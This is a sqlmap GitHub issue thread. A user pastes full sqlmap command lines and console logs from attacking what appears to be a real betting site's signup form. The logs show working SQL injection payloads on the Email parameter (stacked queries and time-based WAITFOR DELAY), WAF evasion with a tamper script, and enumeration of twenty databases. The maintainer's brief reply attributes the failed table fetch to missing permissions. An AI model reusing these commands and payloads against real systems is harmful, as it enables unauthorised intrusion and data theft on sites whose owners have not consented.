### ISSUE TITLE
unable to retrieve the tables for any database   no columns?

### ISSUE THREAD

**Issue by serdaresen06** [sqlmapproject/sqlmap#3031]
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.

C:\Python27\sqlmap>sqlmap.py -u "http://site.com/mobil/signup.html?reg=1" -p
 "Email" --risk="3" --prefix="';" --level="3" --method="POST" --data="GivenName=
Smith&Surname=Smith&bdate=01.01.1985&country=3&city=Chicago&address=3&postcode=1
0000000146&Email=test&gsm=3&Username=Smith&Password=N3tsp%40rker-&PasswordConfir
m=N3tsp%40rker-&terms=3&gender=male" --user-agent="Mozilla/5.0 (Windows NT 6.3;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
 --cookie="ASPSESSIONIDSQASSQAS=HIGBHOADGBCDFIOOIOJKHKCJ; __cfduid=d454b644691b4
401e46088dedd8b6c34d1521892882" --headers="Host:site\nCache-Control:no-c
ache\nReferer:http://site.com/mobil/signup.html\nAccept:text/html,applicatio
n/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Langua
ge:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-
Type:application/x-www-form-urlencoded" --dbms="Microsoft SQL Server" --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.4.5#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 15:39:37

[15:39:38] [INFO] testing connection to the target URL
[15:39:38] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Email (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: GivenName=Smith&Surname=Smith&bdate=01.01.1985&country=3&city=Chica
go&address=3&postcode=10000000146&Email=test';WAITFOR DELAY '0:0:5'--&gsm=3&User
name=Smith&Password=N3tsp@rker-&PasswordConfirm=N3tsp@rker-&terms=3&gender=male

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: GivenName=Smith&Surname=Smith&bdate=01.01.1985&country=3&city=Chica
go&address=3&postcode=10000000146&Email=test'; WAITFOR DELAY '0:0:5'-- xAAd&gsm=
3&Username=Smith&Password=N3tsp@rker-&PasswordConfirm=N3tsp@rker-&terms=3&gender
=male
---
[15:39:38] [INFO] testing Microsoft SQL Server
[15:39:39] [INFO] confirming Microsoft SQL Server
[15:39:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2012
[15:39:39] [INFO] fetching database names
[15:39:39] [INFO] fetching number of databases
[15:39:39] [INFO] resumed: 20
[15:39:39] [INFO] resumed: serdar1
[15:39:39] [INFO] resumed: serdar2
[15:39:39] [INFO] resumed: serdar3
[15:39:39] [INFO] resumed: serdar4
[15:39:39] [INFO] resumed: serdar5
[15:39:39] [INFO] resumed: serdar6
[15:39:39] [INFO] resumed: serdar7
[15:39:39] [INFO] resumed: serdar8
[15:39:39] [INFO] resumed: serdar9
[15:39:39] [INFO] resumed: serdar10
[15:39:39] [INFO] resumed: serdar11
[15:39:39] [INFO] resumed: serdar12
[15:39:39] [INFO] resumed: serdar13
[15:39:39] [INFO] resumed: serdar14
[15:39:39] [INFO] resumed: serdar15
[15:39:39] [INFO] resumed: serdar16
[15:39:39] [INFO] resumed: serdar17
[15:39:39] [INFO] resumed: serdar18
[15:39:39] [INFO] resumed: serdar19
[15:39:39] [INFO] resumed: serdar20

available databases [20]:
[*] serdar1
[*] serdar2
[*] serdar3
[*] serdar4
[*] serdar5
[*] serdar6
[*] serdar7
[*] serdar8
[*] serdar9
[*] serdar10
[*] serdar11
[*] serdar12
[*] serdar13
[*] serdar14
[*] serdar15
[*] serdar16
[*] serdar17
[*] serdar18
[*] serdar19
[*] serdar20

[15:39:39] [INFO] fetched data logged to text files under 'C:\Users\serkan\.sqlm
ap\output\site.com'

[*] shutting down at 15:39:39

C:\Python27\sqlmap>sqlmap.py -u "http://site/mobil/signup.html?reg=1" -p
 "Email" --risk="3" --prefix="';" --level="3" --method="POST" --data="GivenName=
Smith&Surname=Smith&bdate=01.01.1985&country=3&city=Chicago&address=3&postcode=1
0000000146&Email=test&gsm=3&Username=Smith&Password=N3tsp%40rker-&PasswordConfir
m=N3tsp%40rker-&terms=3&gender=male" --user-agent="Mozilla/5.0 (Windows NT 6.3;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
 --cookie="ASPSESSIONIDSQASSQAS=HIGBHOADGBCDFIOOIOJKHKCJ; __cfduid=d454b644691b4
401e46088dedd8b6c34d1521892882" --headers="Host:sitecom\nCache-Control:no-c
ache\nReferer:http://palmabet.com/mobil/signup.html\nAccept:text/html,applicatio
n/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Langua
ge:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-
Type:application/x-www-form-urlencoded" --dbms="Microsoft SQL Server" -D serdar1
 --tables --disable-precon --no-cast --tamper "tamper/charunicodeencode.py"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.4.5#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 15:42:40

[15:42:40] [INFO] loading tamper script 'charunicodeencode'
[15:42:40] [WARNING] tamper script 'charunicodeencode' is only meant to be run a
gainst ASP or ASP.NET web applications
[15:42:41] [INFO] testing connection to the target URL
[15:42:41] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Email (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: GivenName=Smith&Surname=Smith&bdate=01.01.1985&country=3&city=Chica
go&address=3&postcode=10000000146&Email=test';WAITFOR DELAY '0:0:5'--&gsm=3&User
name=Smith&Password=N3tsp@rker-&PasswordConfirm=N3tsp@rker-&terms=3&gender=male

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: GivenName=Smith&Surname=Smith&bdate=01.01.1985&country=3&city=Chica
go&address=3&postcode=10000000146&Email=test'; WAITFOR DELAY '0:0:5'-- xAAd&gsm=
3&Username=Smith&Password=N3tsp@rker-&PasswordConfirm=N3tsp@rker-&terms=3&gender
=male
---
[15:42:41] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[15:42:41] [INFO] testing Microsoft SQL Server
[15:42:42] [INFO] confirming Microsoft SQL Server
[15:42:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2012
[15:42:42] [INFO] fetching tables for database: serdar1
[15:42:42] [INFO] fetching number of tables for database 'serdar1'
[15:42:42] [INFO] resumed: 0
[15:42:42] [CRITICAL] unable to retrieve the tables for any database

[*] shutting down at 15:42:42

C:\Python27\sqlmap>

**Comment by serdaresen06** [comment]
help me stam:)

**Comment by stamparm** [comment]
In MsSQL database names can be fetched without looking into system tables (which require high permissions). I would say that you have permission problems here while trying to access table names (stored inside system tables)

**Comment by stamparm** [comment]
Ok. Great to hear.
